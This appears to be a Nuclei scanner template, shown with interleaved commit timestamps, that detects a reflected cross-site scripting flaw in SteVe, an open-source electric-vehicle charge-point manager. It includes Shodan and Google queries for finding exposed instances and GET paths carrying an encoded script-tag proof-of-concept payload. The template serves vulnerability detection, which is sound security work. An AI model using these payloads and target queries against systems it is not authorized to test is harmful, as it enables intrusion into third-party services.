2022-10-26 16:59:39 +00:00
id : steve-xss
2022-10-26 16:09:38 +00:00
info :
2022-10-26 16:59:39 +00:00
name : SteVe - Cross-Site Scripting
2022-10-26 16:09:38 +00:00
author : clem9669
severity : medium
2022-10-26 16:59:39 +00:00
description : |
The aim of SteVe is to support the deployment and popularity of electric mobility. SteVe provides basic functions for the administration of charge points.
2022-10-26 16:09:38 +00:00
reference :
- https://github.com/steve-community/steve
metadata :
2022-10-26 16:59:39 +00:00
verified : true
2022-10-26 16:09:38 +00:00
shodan-query : http.title:"SteVe - Steckdosenverwaltung"
google-query : intitle:"SteVe - Steckdosenverwaltung"
2022-10-28 14:14:06 +00:00
tags : steve,xss,oss
2022-10-26 16:09:38 +00:00
requests :
- method : GET
path :
- '{{BaseURL}}/steve/services/"%3E%3Cscript%3Ealert(document.domain)%3C/script%3E/services/'
- '{{BaseURL}}/services/"%3E%3Cscript%3Ealert(document.domain)%3C/script%3E/services/'
2022-10-26 16:59:39 +00:00
2022-10-26 16:09:38 +00:00
stop-at-first-match : true
matchers-condition : and
matchers :
- type : word
2022-10-26 16:59:39 +00:00
part : body
2022-10-26 16:09:38 +00:00
words :
2022-10-26 16:59:39 +00:00
- '<script>alert(document.domain)</script>/services/?stylesheet=1">'
2022-10-26 16:09:38 +00:00
- type : word
2022-10-26 16:59:39 +00:00
part : header
2022-10-26 16:09:38 +00:00
words :
- "text/html"
2022-10-26 16:59:39 +00:00
- type : status
status :
- 200
